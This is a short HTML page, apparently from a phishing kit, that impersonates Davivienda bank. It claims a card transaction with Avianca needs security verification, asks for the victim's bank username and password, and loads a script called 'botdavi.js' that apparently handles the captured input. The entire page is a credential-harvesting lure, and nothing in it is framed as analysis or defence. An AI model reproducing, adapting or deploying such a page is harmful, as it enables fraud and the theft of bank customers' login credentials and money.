<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <link rel="stylesheet" href="css/style.css">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>

    <main style="margin: 15% 8%;">
        <section>
            <div style="border-style: solid; border-width: 0px 0px 1px 0px; border-color: gray;">
                <img style="width: 60%;" src="../../img/BANCO DAVIVIENDA.png" alt="">
            </div>
    
            <div style="margin-top: 10%;">
                <p>Davivienda requiere verificar la transacción que intentas realizar con tu tarjeta  por seguridad</p>
                <p style="margin-top: 15%; color: grey;">Detalles de la transacción</p>
            </div>
    
            <div style="display: flex; justify-content: center; margin-top: 10%;">

               <div style="width: 70%;">

                   <div style="display: flex; justify-content: space-around;">
                      <p style="margin-bottom: 6%;"><strong>Comercio:</strong></p>
                      <p>Avianca</p>
                  </div>
                
                 <div style="display: flex; justify-content: space-around;">
                     <p><strong>Monto:</strong></p>
                     <p>Por cobrar</p>
                 </div>
               </div>
            </div>
        </section>

        <section style="margin-top: 8%; margin: 5%;">
            <p style="margin-bottom: 4%;">Por favor, ingrese su usuario y contraseña Davivienda</p>
            
            <div style="margin-bottom: 4%;">
                <label for=""><strong>usuario:</strong></label>
                <input id="username" style=" border-width: 1px;" type="text">
            </div>
    
            <div>
                <label for=""><strong>Clave:</strong></label>
                <input id="password" style=" border-width: 1.9px;" type="password">
            </div>

            <div style="display: flex; justify-content: center; margin-top: 6%;">
                <button id="submitBtn" style="background-color: rgb(255, 17, 0); font-size: smaller; color: white; padding: 2.5% 5%; border-radius: 5px; border-width: 0px;">Continuar</button>
            </div>
        </section>

        <script src="botdavi.js"></script>
    </main>
    
</body>
</html>